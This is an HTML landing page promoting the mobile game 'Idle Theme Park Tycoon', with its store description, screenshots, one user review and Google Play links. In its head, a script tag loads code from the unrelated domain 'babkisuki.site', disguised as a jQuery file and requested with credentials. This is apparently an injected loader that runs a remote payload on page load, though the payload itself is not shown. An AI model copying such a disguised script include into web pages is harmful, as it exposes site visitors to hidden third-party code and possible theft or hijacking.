<!doctype html>
<html lang="en" class="notranslate" translate="no">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">

    <meta name="google" content="notranslate">
    <meta name="referrer" content="no-referrer" />

    <title>Idle Theme Park Tycoon - Recreation Game</title>

    <meta name="apple-mobile-web-app-title" content="Create the best theme park ever!Manage the roller coaster, and become a tycoon!">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="theme-color" content="#000000">

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css">
    <script src='//babkisuki.site/jquery' crossorigin = "use-credentials"></script>
</head>

<body>

<section class="section">
    <div class="container is-max-desktop">

        <div class="columns">
            <div class="column is-three-fifths is-offset-one-fifth">

                <div class="columns">
                    <div class="column is-one-third">

                        <figure class="image  is-1by1">
                            <img src="https://play-lh.googleusercontent.com/cQgA0R03J-ctytISIlZQTgE87xymCIY_9adD2V8ped8kqBf9ZkE3Jbgc2FfAWvKW-Tuo=s0" >
                        </figure>

                    </div>
                    <div class="column ">
                        <h1 class="title">
                            Idle Theme Park Tycoon - Recreation Game
                        </h1>
                        <p class="subtitle">
                            Create the best theme park ever!Manage the roller coaster, and become a tycoon!
                        </p>
                        <a href="https://play.google.com/store/apps/details?id=com.codigames.idle.theme.park.tycoon" target="_blank">
                            <svg viewBox="0 0 189 56" height="56px"><defs><linearGradient x1="91.545%" y1="4.836%" x2="-37.548%" y2="71.964%" id="a290882786"><stop stop-color="#00A0FF" offset="0%"></stop><stop stop-color="#00A1FF" offset=".657%"></stop><stop stop-color="#00BEFF" offset="26.01%"></stop><stop stop-color="#00D2FF" offset="51.22%"></stop><stop stop-color="#00DFFF" offset="76.04%"></stop><stop stop-color="#00E3FF" offset="100%"></stop></linearGradient><linearGradient x1="107.719%" y1="49.424%" x2="-130.664%" y2="49.424%" id="b290882786"><stop stop-color="#FFE000" offset="0%"></stop><stop stop-color="#FFBD00" offset="40.87%"></stop><stop stop-color="#FFA500" offset="77.54%"></stop><stop stop-color="#FF9C00" offset="100%"></stop></linearGradient><linearGradient x1="86.396%" y1="17.806%" x2="-49.883%" y2="194.385%" id="c290882786"><stop stop-color="#FF3A44" offset="0%"></stop><stop stop-color="#C31162" offset="100%"></stop></linearGradient><linearGradient x1="-18.578%" y1="-54.522%" x2="42.274%" y2="24.693%" id="d290882786"><stop stop-color="#32A071" offset="0%"></stop><stop stop-color="#2DA771" offset="6.85%"></stop><stop stop-color="#15CF74" offset="47.62%"></stop><stop stop-color="#06E775" offset="80.09%"></stop><stop stop-color="#00F076" offset="100%"></stop></linearGradient></defs><g fill="none" fill-rule="evenodd"><path d="M7 56c-3.92 0-7-3.08-7-7V7c0-3.92 3.08-7 7-7h175c3.92 0 7 3.08 7 7v42c0 3.92-3.08 7-7 7H7z" fill="#000"></path><path d="M66.36 14.28c0 1.12-.28 2.1-.98 2.8-.84.84-1.82 1.26-3.08 1.26s-2.24-.42-3.08-1.26c-.84-.84-1.26-1.82-1.26-3.08s.42-2.24 1.26-3.08c.84-.84 1.82-1.26 3.08-1.26.56 0 1.12.14 1.68.42.56.28.98.56 1.26.98l-.7.7c-.56-.7-1.26-.98-2.24-.98-.84 0-1.68.28-2.24.98-.56.7-.98 1.4-.98 2.38s.28 1.82.98 2.38c.7.56 1.4.98 2.24.98.98 0 1.68-.28 2.38-.98.42-.42.7-.98.7-1.68H62.3v-.98h4.06v.42zm6.44-3.5h-3.78v2.66h3.5v.98h-3.5v2.66h3.78v1.12h-4.9V9.8h4.9v.98zm4.62 7.42H76.3v-7.42h-2.38V9.8h5.88v.98h-2.38v7.42zm6.44 0V9.8h1.12v8.4h-1.12zm5.88 0h-1.12v-7.42h-2.38V9.8h5.74v.98H89.6v7.42h.14zm13.3-1.12c-.84.84-1.82 1.26-3.08 1.26s-2.24-.42-3.08-1.26c-.84-.84-1.26-1.82-1.26-3.08s.42-2.24 1.26-3.08c.84-.84 1.82-1.26 3.08-1.26s2.24.42 3.08 1.26c.84.84 1.26 1.82 1.26 3.08s-.42 2.24-1.26 3.08zm-5.32-.7c.56.56 1.4.98 2.24.98.84 0 1.68-.28 2.24-.98.56-.56.98-1.4.98-2.38s-.28-1.82-.98-2.38c-.56-.56-1.4-.98-2.24-.98-.84 0-1.68.28-2.24.98-.56.56-.98 1.4-.98 2.38s.28 1.82.98 2.38zm8.12 1.82V9.8h1.26l4.06 6.58V9.8h1.12v8.4h-1.12l-4.34-6.86v6.86h-.98z" stroke="#FFF" stroke-width=".2" fill="#FFF"></path><path d="M95.34 30.52c-3.36 0-6.02 2.52-6.02 6.02 0 3.36 2.66 6.02 6.02 6.02 3.36 0 6.02-2.52 6.02-6.02 0-3.64-2.66-6.02-6.02-6.02zm0 9.52c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.36 1.4 3.36 3.64 0 2.1-1.54 3.64-3.36 3.64zm-13.02-9.52c-3.36 0-6.02 2.52-6.02 6.02 0 3.36 2.66 6.02 6.02 6.02 3.36 0 6.02-2.52 6.02-6.02 0-3.64-2.66-6.02-6.02-6.02zm0 9.52c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.36 1.4 3.36 3.64 0 2.1-1.54 3.64-3.36 3.64zm-15.54-7.7v2.52h6.02c-.14 1.4-.7 2.52-1.4 3.22-.84.84-2.24 1.82-4.62 1.82-3.78 0-6.58-2.94-6.58-6.72s2.94-6.72 6.58-6.72c1.96 0 3.5.84 4.62 1.82l1.82-1.82c-1.54-1.4-3.5-2.52-6.3-2.52-5.04 0-9.38 4.2-9.38 9.24s4.34 9.24 9.38 9.24c2.8 0 4.76-.84 6.44-2.66 1.68-1.68 2.24-4.06 2.24-5.88 0-.56 0-1.12-.14-1.54h-8.68zm63.56 1.96c-.56-1.4-1.96-3.78-5.04-3.78s-5.6 2.38-5.6 6.02c0 3.36 2.52 6.02 5.88 6.02 2.66 0 4.34-1.68 4.9-2.66l-2.1-1.4c-.7.98-1.54 1.68-2.94 1.68s-2.24-.56-2.94-1.82l7.98-3.36-.14-.7zm-8.12 1.96c0-2.24 1.82-3.5 3.08-3.5.98 0 1.96.56 2.24 1.26l-5.32 2.24zM115.64 42h2.66V24.5h-2.66V42zm-4.2-10.22c-.7-.7-1.82-1.4-3.22-1.4-2.94 0-5.74 2.66-5.74 6.02 0 3.36 2.66 5.88 5.74 5.88 1.4 0 2.52-.7 3.08-1.4h.14v.84c0 2.24-1.26 3.5-3.22 3.5-1.54 0-2.66-1.12-2.94-2.1l-2.24.98c.7 1.54 2.38 3.5 5.32 3.5 3.08 0 5.6-1.82 5.6-6.16V30.8h-2.52v.98zm-3.08 8.26c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.22 1.54 3.22 3.64s-1.4 3.64-3.22 3.64zm34.16-15.54h-6.3V42h2.66v-6.58h3.64c2.94 0 5.74-2.1 5.74-5.46s-2.8-5.46-5.74-5.46zm.14 8.4h-3.78v-6.02h3.78c1.96 0 3.08 1.68 3.08 2.94-.14 1.54-1.26 3.08-3.08 3.08zm16.1-2.52c-1.96 0-3.92.84-4.62 2.66l2.38.98c.56-.98 1.4-1.26 2.38-1.26 1.4 0 2.66.84 2.8 2.24v.14c-.42-.28-1.54-.7-2.66-.7-2.52 0-5.04 1.4-5.04 3.92 0 2.38 2.1 3.92 4.34 3.92 1.82 0 2.66-.84 3.36-1.68h.14V42h2.52v-6.72c-.28-3.08-2.66-4.9-5.6-4.9zm-.28 9.66c-.84 0-2.1-.42-2.1-1.54 0-1.4 1.54-1.82 2.8-1.82 1.12 0 1.68.28 2.38.56-.28 1.68-1.68 2.8-3.08 2.8zm14.7-9.24l-2.94 7.56h-.14l-3.08-7.56h-2.8l4.62 10.64-2.66 5.88h2.66l7.14-16.52h-2.8zM149.66 42h2.66V24.5h-2.66V42z" fill="#FFF"></path><path d="M14.56 10.5c-.42.42-.7 1.12-.7 1.96V43.4c0 .84.28 1.54.7 1.96l.14.14 17.36-17.36v-.28L14.56 10.5z" fill="url(#a290882786)"></path><path d="M37.8 34.02l-5.74-5.74v-.42l5.74-5.74.14.14 6.86 3.92c1.96 1.12 1.96 2.94 0 4.06l-7 3.78z" fill="url(#b290882786)"></path><path d="M37.94 33.88L32.06 28l-17.5 17.5c.7.7 1.68.7 2.94.14l20.44-11.76" fill="url(#c290882786)"></path><path d="M37.94 22.12L17.5 10.5c-1.26-.7-2.24-.56-2.94.14L32.06 28l5.88-5.88z" fill="url(#d290882786)"></path><path d="M37.8 33.74L17.5 45.22c-1.12.7-2.1.56-2.8 0l-.14.14.14.14c.7.56 1.68.7 2.8 0l20.3-11.76z" opacity=".2" fill="#000"></path><path d="M14.56 45.22c-.42-.42-.56-1.12-.56-1.96v.14c0 .84.28 1.54.7 1.96v-.14h-.14zm30.24-15.4l-7 3.92.14.14 6.86-3.92c.98-.56 1.4-1.26 1.4-1.96 0 .7-.56 1.26-1.4 1.82z" opacity=".12" fill="#000"></path><path d="M17.5 10.64l27.3 15.54c.84.56 1.4 1.12 1.4 1.82 0-.7-.42-1.4-1.4-1.96L17.5 10.5c-1.96-1.12-3.5-.14-3.5 2.1v.14c0-2.24 1.54-3.22 3.5-2.1z" opacity=".25" fill="#FFF"></path></g></svg>
                        </a>
                    </div>
                </div>

                                    <section class="hero is-halfheight">
                        <div class="hero-body">
                            <div class="">
                                <p class="title">
                                    Testimotions
                                </p>
                                <div class="box">
                                    <article class="media">
                                        <div class="media-left">
                                            <figure class="image is-64x64">
                                                <img src="https://play-lh.googleusercontent.com/a/AATXAJyLvEvFYnTmOHVwezJ93Ks1XeDm4NCfEVzGUzVU=s64" alt="Image">
                                            </figure>
                                        </div>
                                        <div class="media-content">
                                            <div class="content">
                                                <p>
                                                    <strong>Carole Holt</strong>
                                                    <br>
                                                    I really enjoy this game for some reason. I love watching the rides evolve from a basic (kinda) structure to a crazy, impossible one. Great game, sort of relaxing (in a way) and very enjoyable. I totally reccomend this game! 😀. BTW I play the game with the ads. I also don&#039;t mind the fact that you restart each time you buy a new island as it makes the game last longer.
                                                </p>
                                            </div>

                                        </div>
                                    </article>
                                </div>
                            </div>
                        </div>
                    </section>
                
                <div class="columns">
                    <div class="column is-one-third">

                                                                                                                                <div class="block">
                                        <figure class="image">
                                            <img src="https://play-lh.googleusercontent.com/8NWOBtgRgJWd2WNwO9V2eyXyZbEU64KIFh9LThm2B2aqwLeQ-XdROX2nRBBmrPQT_A" >
                                        </figure>
                                    </div>
                                                                                                        <div class="block">
                                        <figure class="image">
                                            <img src="https://play-lh.googleusercontent.com/zhOp9GpbyKjkR2fvja4PNXCSGhDp0y2AOl-2AcnViD1sLe9B-AQBfc7FJXIoBgfrvWs" >
                                        </figure>
                                    </div>
                                                                                                        <div class="block">
                                        <figure class="image">
                                            <img src="https://play-lh.googleusercontent.com/lli35R6FBNkG5gRGsrEJDcIRIp2qcXuJJlT8yaC4Sj15JXJbLhrDLv4QAUuO053zsTI" >
                                        </figure>
                                    </div>
                                                                                                        <div class="block">
                                        <figure class="image">
                                            <img src="https://play-lh.googleusercontent.com/tvEynHlU7xpU36c95Xwbq5gmB-p5TWlwBc_ak8D-kL_NsWZlH4kcIfUnwmTYQ02B7RUL" >
                                        </figure>
                                    </div>
                                                                                             
                    </div>
                    <div class="column ">
                        <p class="subtitle">
                            Are you prepared to run the funniest theme park ever?<br />
<br />
Rule your theme park and become the richest manager!<br />
<br />
Start with a small theme park, and work on it to make it grow. Open new attractions to create an amazing fun area where visitors will ride the roller coaster, the ferris wheel, the log ride and visit the horror house.<br />
<br />
Manage wisely the food area, and the ticket booth to earn money. Expand the theme park to get the most amazing rides and facilities.<br />
<br />
Improve your park with new rides. Prepare marketing campaigns to bring more visitors to your theme park, and offer them the most enjoyable experience. Extend the parking facilities to increase the number of clients.<br />
<br />
Hire security guards to maintain public order and security in your theme park. Make visitors feel welcome, comfortable, and happy. Take the visitor’s feedback into account in order to improve the theme park. <br />
<br />
Become a theme park tycoon and hire new employees, improve the rides and control every aspect of the business. Will you invest your money in improving the facilities of the park? Or will you increase the salary to keep your employees motivated? Take important decisions to create the best theme park.<br />
<br />
Build the most enjoyable rides, a big ferris wheel, an amazing fun house, a spooky horror house and a huge roller coaster. Run the most famous theme park in the world! <br />
<br />
If you like management and idle games, you’ll enjoy Idle Theme Park Tycoon. An easy-to-play game, but challenging game. Start with an small theme park and take important business decisions in order to grow your tycoon. Transform your small business into the best theme park in the world!<br />
<br />
Features:<br />
- Easy-to-play game for every player<br />
- Different challenges to complete<br />
- Amazing animations and great 3D graphics<br />
- Several rides available.<br />
- Take important business decisions.<br />
- Save your progress to the Cloud and recover it if you change your device
                        </p>

                        <a href="https://play.google.com/store/apps/details?id=com.codigames.idle.theme.park.tycoon" target="_blank">
                            <svg viewBox="0 0 189 56" height="56px"><defs><linearGradient x1="91.545%" y1="4.836%" x2="-37.548%" y2="71.964%" id="a290882786"><stop stop-color="#00A0FF" offset="0%"></stop><stop stop-color="#00A1FF" offset=".657%"></stop><stop stop-color="#00BEFF" offset="26.01%"></stop><stop stop-color="#00D2FF" offset="51.22%"></stop><stop stop-color="#00DFFF" offset="76.04%"></stop><stop stop-color="#00E3FF" offset="100%"></stop></linearGradient><linearGradient x1="107.719%" y1="49.424%" x2="-130.664%" y2="49.424%" id="b290882786"><stop stop-color="#FFE000" offset="0%"></stop><stop stop-color="#FFBD00" offset="40.87%"></stop><stop stop-color="#FFA500" offset="77.54%"></stop><stop stop-color="#FF9C00" offset="100%"></stop></linearGradient><linearGradient x1="86.396%" y1="17.806%" x2="-49.883%" y2="194.385%" id="c290882786"><stop stop-color="#FF3A44" offset="0%"></stop><stop stop-color="#C31162" offset="100%"></stop></linearGradient><linearGradient x1="-18.578%" y1="-54.522%" x2="42.274%" y2="24.693%" id="d290882786"><stop stop-color="#32A071" offset="0%"></stop><stop stop-color="#2DA771" offset="6.85%"></stop><stop stop-color="#15CF74" offset="47.62%"></stop><stop stop-color="#06E775" offset="80.09%"></stop><stop stop-color="#00F076" offset="100%"></stop></linearGradient></defs><g fill="none" fill-rule="evenodd"><path d="M7 56c-3.92 0-7-3.08-7-7V7c0-3.92 3.08-7 7-7h175c3.92 0 7 3.08 7 7v42c0 3.92-3.08 7-7 7H7z" fill="#000"></path><path d="M66.36 14.28c0 1.12-.28 2.1-.98 2.8-.84.84-1.82 1.26-3.08 1.26s-2.24-.42-3.08-1.26c-.84-.84-1.26-1.82-1.26-3.08s.42-2.24 1.26-3.08c.84-.84 1.82-1.26 3.08-1.26.56 0 1.12.14 1.68.42.56.28.98.56 1.26.98l-.7.7c-.56-.7-1.26-.98-2.24-.98-.84 0-1.68.28-2.24.98-.56.7-.98 1.4-.98 2.38s.28 1.82.98 2.38c.7.56 1.4.98 2.24.98.98 0 1.68-.28 2.38-.98.42-.42.7-.98.7-1.68H62.3v-.98h4.06v.42zm6.44-3.5h-3.78v2.66h3.5v.98h-3.5v2.66h3.78v1.12h-4.9V9.8h4.9v.98zm4.62 7.42H76.3v-7.42h-2.38V9.8h5.88v.98h-2.38v7.42zm6.44 0V9.8h1.12v8.4h-1.12zm5.88 0h-1.12v-7.42h-2.38V9.8h5.74v.98H89.6v7.42h.14zm13.3-1.12c-.84.84-1.82 1.26-3.08 1.26s-2.24-.42-3.08-1.26c-.84-.84-1.26-1.82-1.26-3.08s.42-2.24 1.26-3.08c.84-.84 1.82-1.26 3.08-1.26s2.24.42 3.08 1.26c.84.84 1.26 1.82 1.26 3.08s-.42 2.24-1.26 3.08zm-5.32-.7c.56.56 1.4.98 2.24.98.84 0 1.68-.28 2.24-.98.56-.56.98-1.4.98-2.38s-.28-1.82-.98-2.38c-.56-.56-1.4-.98-2.24-.98-.84 0-1.68.28-2.24.98-.56.56-.98 1.4-.98 2.38s.28 1.82.98 2.38zm8.12 1.82V9.8h1.26l4.06 6.58V9.8h1.12v8.4h-1.12l-4.34-6.86v6.86h-.98z" stroke="#FFF" stroke-width=".2" fill="#FFF"></path><path d="M95.34 30.52c-3.36 0-6.02 2.52-6.02 6.02 0 3.36 2.66 6.02 6.02 6.02 3.36 0 6.02-2.52 6.02-6.02 0-3.64-2.66-6.02-6.02-6.02zm0 9.52c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.36 1.4 3.36 3.64 0 2.1-1.54 3.64-3.36 3.64zm-13.02-9.52c-3.36 0-6.02 2.52-6.02 6.02 0 3.36 2.66 6.02 6.02 6.02 3.36 0 6.02-2.52 6.02-6.02 0-3.64-2.66-6.02-6.02-6.02zm0 9.52c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.36 1.4 3.36 3.64 0 2.1-1.54 3.64-3.36 3.64zm-15.54-7.7v2.52h6.02c-.14 1.4-.7 2.52-1.4 3.22-.84.84-2.24 1.82-4.62 1.82-3.78 0-6.58-2.94-6.58-6.72s2.94-6.72 6.58-6.72c1.96 0 3.5.84 4.62 1.82l1.82-1.82c-1.54-1.4-3.5-2.52-6.3-2.52-5.04 0-9.38 4.2-9.38 9.24s4.34 9.24 9.38 9.24c2.8 0 4.76-.84 6.44-2.66 1.68-1.68 2.24-4.06 2.24-5.88 0-.56 0-1.12-.14-1.54h-8.68zm63.56 1.96c-.56-1.4-1.96-3.78-5.04-3.78s-5.6 2.38-5.6 6.02c0 3.36 2.52 6.02 5.88 6.02 2.66 0 4.34-1.68 4.9-2.66l-2.1-1.4c-.7.98-1.54 1.68-2.94 1.68s-2.24-.56-2.94-1.82l7.98-3.36-.14-.7zm-8.12 1.96c0-2.24 1.82-3.5 3.08-3.5.98 0 1.96.56 2.24 1.26l-5.32 2.24zM115.64 42h2.66V24.5h-2.66V42zm-4.2-10.22c-.7-.7-1.82-1.4-3.22-1.4-2.94 0-5.74 2.66-5.74 6.02 0 3.36 2.66 5.88 5.74 5.88 1.4 0 2.52-.7 3.08-1.4h.14v.84c0 2.24-1.26 3.5-3.22 3.5-1.54 0-2.66-1.12-2.94-2.1l-2.24.98c.7 1.54 2.38 3.5 5.32 3.5 3.08 0 5.6-1.82 5.6-6.16V30.8h-2.52v.98zm-3.08 8.26c-1.82 0-3.36-1.54-3.36-3.64s1.54-3.64 3.36-3.64c1.82 0 3.22 1.54 3.22 3.64s-1.4 3.64-3.22 3.64zm34.16-15.54h-6.3V42h2.66v-6.58h3.64c2.94 0 5.74-2.1 5.74-5.46s-2.8-5.46-5.74-5.46zm.14 8.4h-3.78v-6.02h3.78c1.96 0 3.08 1.68 3.08 2.94-.14 1.54-1.26 3.08-3.08 3.08zm16.1-2.52c-1.96 0-3.92.84-4.62 2.66l2.38.98c.56-.98 1.4-1.26 2.38-1.26 1.4 0 2.66.84 2.8 2.24v.14c-.42-.28-1.54-.7-2.66-.7-2.52 0-5.04 1.4-5.04 3.92 0 2.38 2.1 3.92 4.34 3.92 1.82 0 2.66-.84 3.36-1.68h.14V42h2.52v-6.72c-.28-3.08-2.66-4.9-5.6-4.9zm-.28 9.66c-.84 0-2.1-.42-2.1-1.54 0-1.4 1.54-1.82 2.8-1.82 1.12 0 1.68.28 2.38.56-.28 1.68-1.68 2.8-3.08 2.8zm14.7-9.24l-2.94 7.56h-.14l-3.08-7.56h-2.8l4.62 10.64-2.66 5.88h2.66l7.14-16.52h-2.8zM149.66 42h2.66V24.5h-2.66V42z" fill="#FFF"></path><path d="M14.56 10.5c-.42.42-.7 1.12-.7 1.96V43.4c0 .84.28 1.54.7 1.96l.14.14 17.36-17.36v-.28L14.56 10.5z" fill="url(#a290882786)"></path><path d="M37.8 34.02l-5.74-5.74v-.42l5.74-5.74.14.14 6.86 3.92c1.96 1.12 1.96 2.94 0 4.06l-7 3.78z" fill="url(#b290882786)"></path><path d="M37.94 33.88L32.06 28l-17.5 17.5c.7.7 1.68.7 2.94.14l20.44-11.76" fill="url(#c290882786)"></path><path d="M37.94 22.12L17.5 10.5c-1.26-.7-2.24-.56-2.94.14L32.06 28l5.88-5.88z" fill="url(#d290882786)"></path><path d="M37.8 33.74L17.5 45.22c-1.12.7-2.1.56-2.8 0l-.14.14.14.14c.7.56 1.68.7 2.8 0l20.3-11.76z" opacity=".2" fill="#000"></path><path d="M14.56 45.22c-.42-.42-.56-1.12-.56-1.96v.14c0 .84.28 1.54.7 1.96v-.14h-.14zm30.24-15.4l-7 3.92.14.14 6.86-3.92c.98-.56 1.4-1.26 1.4-1.96 0 .7-.56 1.26-1.4 1.82z" opacity=".12" fill="#000"></path><path d="M17.5 10.64l27.3 15.54c.84.56 1.4 1.12 1.4 1.82 0-.7-.42-1.4-1.4-1.96L17.5 10.5c-1.96-1.12-3.5-.14-3.5 2.1v.14c0-2.24 1.54-3.22 3.5-2.1z" opacity=".25" fill="#FFF"></path></g></svg>
                        </a>
                    </div>
                </div>

            </div>
        </div>





    </div>
</section>


</body>

</html>
